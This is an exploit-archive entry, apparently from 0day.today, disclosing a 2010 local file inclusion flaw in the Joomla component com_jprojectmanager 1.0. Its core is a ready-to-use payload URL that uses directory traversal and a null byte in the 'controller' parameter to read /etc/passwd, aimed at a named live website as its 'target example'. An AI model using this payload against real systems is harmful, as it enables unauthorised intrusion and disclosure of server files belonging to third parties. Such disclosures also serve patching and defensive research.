id: 11719
date: 04/11/2010
title: Joomla Component com_jprojectmanager Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

=======================================================================
Joomla Component com_jprojectmanager Local File Inclusion Vulnerability
=======================================================================

# Exploit Title:
Joomla Component JProject Manager Local File Inclusion Vulnerability
 
# Date:
April 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://www.joomla.ternaria.com/
 
# Version:
com_jprojectmanager version 1.0
 
# Tested on:
Linux
 
# Target example
http://www.asalsolutions.com/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-24]  #